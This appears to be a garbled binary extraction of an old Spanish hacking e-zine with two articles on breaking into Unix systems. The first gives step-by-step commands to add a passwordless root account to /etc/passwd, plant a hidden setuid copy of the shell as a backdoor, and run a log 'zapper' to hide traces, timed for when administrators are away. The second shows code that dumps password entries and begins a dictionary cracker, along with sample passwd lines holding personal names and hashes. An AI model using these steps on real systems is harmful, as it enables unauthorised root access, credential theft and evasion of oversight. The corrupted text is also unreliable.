€‑ŒŒFÖ€€€‚€€‚ÿLa cuenta BIN tiene que tener como OWNER (propietario, ahora lo explico) el fichero Passwd.El OWNER (propietario) de un fichero es el que tiene permisos para hacer con el lo que sea, el root es el OWNER de todo el sistema y unãÎþ[1]4Êa cuenta de nivel de usuario, tiene los permisos de todo su directorio y de los ficheros que tenga la cuenta BIN. Cada fichero puede tener unos permisos que pueden ser : lectura, escritura o ejecución, así por ejemplo un haces lo siguiente:[2ãÎY[1]) "€d€‑ŒŒF9€‚‚ÿ$ls -lr-xrwxr-- atila root 512 Jun 12 shellL[1][1]þ[1]¥

[1]6 :€-

€‑ŒŒFÖ€‚€€‚€€‚ÿLa primera palabra (r-xrwxr--) nos dice los permisos del fichero shell, y esta compuesto por 3 grupos de 3 letras juntos.r-x : son los permisos del OWNER o propietario del archivo r = read , x=ejecutable. Se puede leer y ejecutar el archivo, pero no escribir.rwx : son los permisos del grupo al cual pertenece el usuario, (los usuarios además pertenecen a un grupo, ósea que puede haber un grupo de roots, y un grupo de usuarios) y quiere decir que puede leer(r), escribir (w) y ejecutar (x), el fichero, en este caso shell.’FY[1]7[1]L f€[1]€‑ŒŒFÖ€€‚€€‚€€‚€€€€€€‚ÿ r-- : Son los permisos de los demás usuarios como los anónimos, o cualquier otro usuario, y solamente pueden leer (r), el fichero.La segunda palabra (atila) es el nombre del usuario.La tercera (root) el grupo al que pertenece.Después vienen: el tamaño (512), la fecha (Jun 12) y el nombre del fichero (shell)‘h¥

[1]È[1]) €Ñ[1]€
ŒŒF€‚‚‚ÿLa cuenta bin es la que se encarga de decir que ficheros puedes tocar.En muchos sistemas la cuenta bin es el propietario del fichero passwd, lo cual quiere decir que podemos modificar el archivo, y lo cual también quiere decir que podemos añadir una cuenta con los privilegios que queramos.Para añadir una cuenta hay que hacer lo siguiente (sin password):•f7[1]][1]/ .€Ì€‑ŒŒF€‚‚‚‚‚‚‚‚ÿ$ed /etc/passwd[ un numero de bytes ]* aatila::0:0:AtilA:/usr/atila/:/usr/sh{control+d}*w*q$œ

È[1]ù
[1]/ ,€Û€
ŒŒF€‚€€‚‚ÿUna vez hecho esto debemos tener en cuenta que si modificamos el fichero passwd, el administrador se daría cuenta enseguida, así que debemos Hackear cuando estemos seguros de que el administrador no este delante del ordenador (un domingo por la noche, por ejemplo o en alguna fiesta nacional, cuando todo el mundo se divierte, tu ... TAMBIEN je,je,je), y debemos hacerlo rápido.Ahora una vez añadido una cuenta, ponemos: exec login y entramos como ROOT.El root cuando entra en el sistema tiene un shell, que es en realidad el que le convierte en root, pues uno de nuestros objetivos es copiar ese shell que normalmente esta en /bin/sh a un archivo que tengas en tu directorio (con lo cual podrás ejecutarlo), por ejemplo /usr/atila/.shell, (suponiendo que entremos con la cuenta de Atila) de tal manera que cuando ejecutes ese archivo SERAS ROOT. Se hace de esta manera:¼Š][1]µ
[1]2 2€€‑ŒŒF€€‚€‚‚‚ÿ$cp /bin/sh /usr/atila/.shell (el punto antes del nombre indica que el archivo shelles oculto)$chmod a+s /usr/atila/.shell $shell##[1]ïù
[1]Ø

[1]4 6€ß

€
ŒŒF€‚€€€€‚ÿUna vez llegado aquí te aconsejo que borres la cuenta de root que te creaste y añadas una de usuario normal, puesto que es un cantazo para el administrador si le da por mirar el passwd. Así cada vez que entres en el sistema ejecutas el archivo en el cual tenias copiado el shell del root, y volverás a ser root. RECUERDA que no debes dejar huellas, aunque si no vas ha hacer nada malo no le des mucha importancia (yo siempre se la doy), mete algún ZAPPER y ocúltalo o haz lo que quieras.

àµ
[1]å
[1]- (€Á€
ÈŒF[1]€€‚ÿNota para los novatos: Un ZAPPER es un programa que elimina todas tus huellas de los ficheros que guardan todo lo que haces, desde ejecutar un fichero hasta tu entrada en el sistema, sin tener que borrar todo el fichero.Z4Ø

[1]?[1]& €h€
ŒŒF€‚ÿLo metes vía FTP y lo compilas poniendo algo así:ÖŸå
[1]!@[1]7 <€?€‑ŒŒF€€‚€€‚€‚ÿ$ cc -o zapper zapper.c (siendo zapper el binario y zapper.c el código fuente que has metido por FTP)$ zapper (esto ultimo es para ej?[1]!@[1]4Êecutarlo, claro)$ªƒ?[1]Ë@[1]' €€
ŒŒF€‚ÿAquí cada uno hace lo que le plazca, el sistema es tuyo, y es además donde entra en juego la ética del Hacker o la del Cracker. Ü²!@[1]§B[1]* "€e

€
ŒŒF
€‚ÿTen en cuenta que este método se basa en la mala configuración del sistema al que entres y que además debe ser un sistema donde halla muchos usuarios porque de los contrario solamente podrás hackear una vez (a no ser que el administrador sea tonto). Los lugares idóneos, suelen ser Universidades, o nuevos sites, donde no han tenido tiempo para borrar todas las cuentas default o no han puesto todos los parches para los bugs, etc.c<Ë@[1]
D[1]' €y[1]€
°ŒF€‚ÿBueno hasta aquí ha llegado mi articulillo, que para los neófitos será de gran ayuda y para los no tan neófitos un coñazo. Si el jefe me deja, volveré a escribir aquí, pero la próxima vez comenzaré ha sacarle el jugo a los bugs que al fin y al cabo es la manera por excelencia de hackear ( y la que mas funciona).3
§B[1]=D[1]( €€‑°°Fû„€
‚ÿBy AtilA^-
D[1]›D[1]1[1]^

[1]ˆ

‚…

›D[1] E[1]6H[1]Cómo cracker cualquier sistema basado en UnixnE=D[1] E[1]) "€Š€
°ŒF€
€‚ÿCómo cracker cualquier sistema basado en Unix (Conceptos básicos)Ç…›D[1]ÐE[1]B R€
€
ŒŒFã¿pŒ™€‰‚ãw´Íù‰‚ãÛðtæ‰‚ãL¢Á‰‚ÿIntroducción¿Por qué es importante conocer Unix?¿Por qué es facil crackear un sistema unix?Capturando el fichero passwdX$ E[1](F[1]4 8€H€‑ŒŒFòãHÀ-€‰‚ãÈGJã‰‚ÿUnixOtros sistemas derivados¿„ÐE[1]çF[1]; D€ €
ŒŒFã×¢

€‰‚ãm
Ò³‰‚ãÐê5f‰‚ÿ¿Es posible desencriptar un password?¿Para que sirven los famosos diccionarios?¿Como averiguar password con diccionarios?f2(F[1]MG[1]4 8€d€‑ŒŒFòãºLÐ€‰‚ã´Ã/S‰‚ÿUn programa ejemploGeneradores de palabras\)çF[1]©G[1]3 6€R€
ŒŒFãë±üÿ€‰‚ã

]‰‚ÿCuentas unix por defectoDespedidaW+MG[1]H[1], (€V€
ÈŒF€€
€‚ÿE-Mail: GUYBRUSH@santandersupernet.com6
©G[1]6H[1]( €€‑°°Fû„€
‚ÿBy Guybrush=
H[1]sH[1]1[1]l[1]|ƒ

|‡

sH[1]¬H[1]çJ[1]Introducción96H[1]¬H[1]) "€ €
°ŒF€
€‚ÿIntroducción[1]ÜsH[1]±J[1]) €¹

€
ŒŒF€‚‚‚ÿNo voy a contaros toda la historia del Unix ya que además de ser aburrida, imagino que estaréis hartos de leerla.Simplemente quiero decir que este es un documento bastante básico sobre seguridad en Unix, pero que viene muy bien sobre todo a la gente que estudia o trabaja en alguna Universidad o cualquier otro centro y tiene acceso al shell del servidor.También me gustaría que si alguien tiene dudas sobre lo que aquí escribo, o cualquier otra cosa, me mande un e-mail.6
¬H[1]çJ[1]( €€‑°°Fû„€
‚ÿBy GuybrushU$±J[1]<K[1]1[1]¤

‚…

<K[1]‰K[1]üN[1]¿Por qué es importante conocer Unix?M'çJ[1]‰K[1]& €N€
°ŒF€
‚ÿ¿Por qué es importante conocer Unix?#[1]ü<K[1]¬M[1]' €ù

€
ŒŒF€‚ÿUnix es un sistema operativo multitarea y multiusuario, y que además, lleva muchos años funcionando como tal. Aunque con la aparición del Windows NT (aparentemente bastante seguro, aunque con muchos bugs :) - pero eso es otro tema) est‚ decreciendo el número de empresas que usan Unix, sigue siendo hoy en día uno de los sistemas operativo m s 'seguros' que existen. Por lo que muchísimas empresas (y sobre todo Universidades) lo usan. Además es más fácil hackear desde un sistema Unix que desde Windows.ó‰K[1]ÆN[1]' €ç€
ŒŒF€‚ÿCómo podemos nosotros hackear desde un Unix (o derivado de ‚l)? Debemos disponer de una cuenta shell (que nos la debe de dar nuestro proveedor de Internet) o bien accediendo a Internet mediante Linux. Pero esto lo veremos en otras revistas.6
¬M[1]üN[1]( €€‑°°Fû„€
‚ÿBy Guybrush\+ÆN[1]XO[1]1[1]Š|‡

XO[1]¬O[1]›„[1]¿Por qué es facil crackear un sistema unix?T.üN[1]¬O[1]& €\€
°ŒF€
‚ÿ¿Por qué es facil crackear un sistema unix?

Ý[1]XO[1]¾‚[1]) €»€
ŒŒF€‚‚‚ÿLos que inventaron Unix crearon un sistema¬O[1]¾‚[1]üN[1] bastante seguro, pero no perfecto.Todos los sistemas tienen bugs, y a pesar de que en cada nueva versión hay menos agujeros, sigue siendo imperfecto. Hay algunos fallos en el diseño del sistema que un programador muy experimentado podría aprovechar. Por ejemplo: un usuario no puede crear un directorio. No tiene permiso para ello.Por lo que cuando hacemos un mkdir, le pasamos el control (por mil‚simas de segundo) a root, que es el que se encarga de crearlo y luego devolvernos el control. Imagina lo que ocurriría si fuéramos capaces de causar una interrupción en ese pequeño tiempo en que root tiene el control!! Automáticamente pasaríamos a ser los dueños y señores del sistema.§¬O[1]e„[1]( ‑€ÿ[1]€
ŒŒF€‚‚ÿPero yo no voy a enseñar ningún bug, ni tampoco programación avanzada. Sólo voy a mostrar una forma muy simple de conseguir cuentas. Y si el administrador es un poco lamer incluso podremos ser root.El sistema Unix tiene un método de cifrado muy bueno, pero guarda la información de todos los usuario junto con sus password (lógicamente cifrados) en un fichero. El fichero passwd.6
¾‚[1]›„[1]( €€‑°°Fû„€
‚ÿBy GuybrushMe„[1]è„[1]1[1]Ö
Š

R€è„[1]-…[1]_Á[1]Capturando el fichero passwdE›„[1]-…[1]& €>€
°ŒF€
‚ÿCapturando el fichero passwd1è„[1]^…[1]) "€€
°°F€€‚ÿUnix[1]æ-…[1]p‡[1], &€Í

€
ŒŒF€‚‚‚‚‚‚ÿEn Unix es muy sencillo leer este fichero, ya que es accesible a cualquier usuario. Se encuentra en el directorio /etc. Y tiene la siguiente forma:paco:ZbkEM2vQVowcw:10013:202:PACO SANCHEZ PENADES:/users/s02/a00013:/bin/kshelisa:GeJuwMrBVa6mg:10016:202:ELISA J. CRIVILLES:/users/s03/a00016:/bin/kshpepe:GezuA6krN/BsE:10019:202:PEPE PEÑALVER BENAVENT:/users/s03/a00019:/bin/kshjuan:Ge7EPYLjRYX9I:10022:202:JUAN BELLIDO IBORRA:/users/s01/a00022:/bin/ksh¿Qué‚ significa todo esto? Q+^…[1]Á‡[1]& €V€
ŒŒF€‚ÿVeamos, el fichero contiene estos datos:8p‡[1]ù‡[1]( € €‑ŒŒF«€€‚ÿ1:2:3:4:5:6:7/ Á‡[1](ˆ[1]& €€
ŒŒF€‚ÿdonde:öÇù‡[1]‑‰[1]/ ,€€‑ŒŒF«€€‚‚‚‚‚‚‚ÿ1) nombre del usuario2) password encriptado3) número UID (identificación de usuario)4) número GID (identificación de grupo)5) datos del usuario6) directorio de trabajo7) directorio del shellA(ˆ[1]_‰[1]& €6€
°°F€‚ÿOtros sistemas derivados™s‑‰[1]ø‰[1]& €æ€
ŒŒF€‚ÿNo todos los sistemas guardan el fichero passwd en /etc. He aquí una lista de varios sistemas y sus directorios:[1]¡_‰[1]ÿ‹[1]f š€C

€‑ŒŒFò€ƒƒƒƒ‚ƒƒƒ‚ƒƒƒ‚ƒƒƒ‚ƒƒƒ‚ƒƒƒƒ‚ƒƒƒƒ‚ƒƒƒƒ‚ƒƒƒƒ‚ƒƒƒƒ‚ƒƒƒƒ‚ƒƒƒ‚ƒƒƒ‚ƒƒƒ‚ÿAIX 3/etc/security/passwdA/UX 3.0s/tcb/files/auth/?BSD4.3-Reno/etc/master.passwdConvexOS 10/etc/shadpwConvexOS 11/etc/shadowDG/UX/etc/tcb/aa/user/EP/IX/etc/shadowHP-UX/.secure/etc/passwdIRIX 5/etc/shadowLinux 1.1/etc/shadowOSF/1/etc/passwd[.dir|.pag]SCO Unix #.2.x/tcb/auth/files/<first letterSunOS4.1+c2/etc/security/passwd.adjunctSunOS 5.0/etc/shadow¾‡ø‰[1]½Œ[1]7 <€€‑ŒŒFò€ƒƒ‚ƒƒ‚ƒƒƒƒ‚ƒƒƒƒ‚ÿSystem V Release 4.0/etc/shadowSystem V Release 4.2/etc/security/* databaseUltrix 4/etc/auth[.dir|.pag]UNICOS/etc/udbO(ÿ‹[1]
[1]' ‑€P€‑

ŒÈFò€‚ÿ(lista sacada de los FAQ de alt.2600)W½Œ[1]‹Ž[1]( ‑€¯[1]€
ŒŒF€‚‚ÿEn muchos de estos sistemas, el directorio que contiene el fichero passwd no es de acceso a usuarios que no sean root, por lo que no podemos ver el contenido del directorio. Pero esto no es ningún impedimento para nosotros. Aquí posteo un pequeño programa con el que reconstruimos el fichero passwd, a pesar de que no podamos acceder a él:$[1]ç
[1]»À[1]= H€Ï

€F€€‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚ÿ// Programa que reconstruye el fichero passwd.// Copyright (c) Guybrush// Compilar en c++ y redireccionar la salida a un fichero// cc cogerPass.cc -o cogerPass > fichero#include <iostream.h>#include <pwd.h>struct passwd *pw;main(){ while ((pw = getpwent()) != NULL) { cout << pw->pw_na‹Ž[1]»À[1]›„[1]me; cout << ":" << pw->pw_passwd; cout << ":" << pw->pw_uid; cout << ":" << pw->pw_gid; cout << ":" << pw->pw_gecos; cout << ":" << pw->pw_dir;nD‹Ž[1])Á[1]* $€ˆ€F€€‚‚‚‚‚ÿ cout << ":" << pw->pw_shell << endl; } endpwent();}6
»À[1]_Á[1]( €€‑°°Fû„€
‚ÿBy GuybrushV%)Á[1]µÁ[1]1[1]°‚…µÁ[1]

Â[1]‚Ç[1]¿Es posible desencriptar un password?N(_Á[1]

Â[1]& €P€
°ŒF€
‚ÿ¿Es posible desencriptar un password?ý

µÁ[1]Æ[1]( ‑€«€
ŒŒF€‚‚ÿNingún cifrado es indescifrable, pero hay algunos que con los ordenadores de hoy en día se tardarían muchos años en poder descifrar, como es el caso del cifrado de Unix.Cuando creamos un password, Unix aplica sobre ‚l el algoritmo de cifrado llamado DES, el cual era un algoritmo prácticamente indescifrable cuando se ideó, pero que con el paso del tiempo y la tremenda evolución de la tecnología, cada día se hace más posible su desencriptado, dada la velocidad de los ordenadores actuales. Pero la cosa no es tan fácil ya que Unix no aplica este algoritmo una sola vez, sino que lo aplica 25 veces. Una vez que encripta la palabra, la vuelve a encriptar, y así sucesivamente, hasta 25. Y por si fuera poco, a la palabra resultante le añade dos caracteres m s, llamados salt, que provienen de la hora de encriptado. Es decir, si nosotros encriptamos la palabra pepe a las 20:00 y la volvemos a encriptar a las 20:05 (por ejemplo), la palabra cifrada resultante no es la misma.L%

Â[1]LÇ[1]' €K[1]€
ŒŒF€‚ÿCada palabra tiene 4.096 formas distintas!! de desencriptarse. Por lo que si has pensado alguna vez en descifrar una palabra ... ni lo sueñes (por lo menos con los ordenadores de hoy en día). Es prácticamente imposible (se tardaría una eternidad). Por eso recurrimos a los diccionarios...6
Æ[1]‚Ç[1]( €€‑°°Fû„€
‚ÿBy Guybrush[*LÇ[1]ÝÇ[1]1[1])

R€XˆÝÇ[1]0È[1](Ë[1]¿Para que sirven los famosos diccionarios?S-‚Ç[1]0È[1]& €Z€
°ŒF€
‚ÿ¿Para que sirven los famosos diccionarios?Â[1]›[1]ÝÇ[1]òÊ[1]' €7€
ŒŒF€‚ÿComo hemos visto, no podemos descifrar un password, pero sí que podemos cifrar palabras con todos los salt posibles y compararlas con la que ya tenemos cifrada. Por ejemplo, ciframos la palabra árbol, le quitamos el salt y le añadimos todas las combinaciones. Luego las comparamos con el password ya cifrado y si son iguales ... ,ya tenemos la clave!. Pero tampoco es cuestión de comenzar a introducir palabras por teclado ya que se nos haría eterno y muy engorroso, por lo que primero podemos construir un diccionario (hay muchos en Internet), el cual le pasaremos como par metro al programa comparador que tengamos. Y ‚l se encargar de realizar todo el trabajo.6
0È[1](Ë[1]( €€‑°°Fû„€
‚ÿBy Guybrush[*òÊ[1]ƒË[1]1[1]AS‚…êƒË[1]ÖË[1]#

¿Cómo averiguar password con diccionarios?S-(Ë[1]ÖË[1]& €Z€
°ŒF€
‚ÿ¿Cómo averiguar password con diccionarios?<ƒË[1]Ì[1]& €,€
°°F€‚ÿUn programa ejemplo™[1]q[1]ÖË[1]«Î[1]( ‑€ã

€
ŒŒF€‚‚ÿHe aquí un pequeño programa que encripta y comprara palabras. Es de lo más básico, por lo que no deberías tener ningún problema en entenderlo. También existen otros que funcionan bajo DOS y que funcionan más rápido como son: brute, jack crack, john the ripper, ... Te recomiendo que los consigas.Este programa comprueba que el usuario exista en esa máquina y captura ‚él mismo la palabra encriptada. Si quieres puedes modificarlo para que le puedas pasar como par metro la palabra encriptada y que trabaje en tu misma casa. También acepta cualquier texto ya que ‚él mismo se encarga de desechar los caracteres especiales:[1]ÇÌ[1]¾

@ N€

€€€‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚ÿ// Programa que lee palabras de cualquier diccionario o texto y después de// encriptarlas las compara.// Copyright (c) Guybrush#include <stdio.h>#include <pwd.h>char cadena[30];char clave[30];struct passwd *pwd;int desencripta(char *clave, char *archivo){ F«Î[1]¾

(Ë[1]ILE *fichero; char *crypt(), *resp; int cont; if ((fichero = fopen(archivo,"r")) == NULL)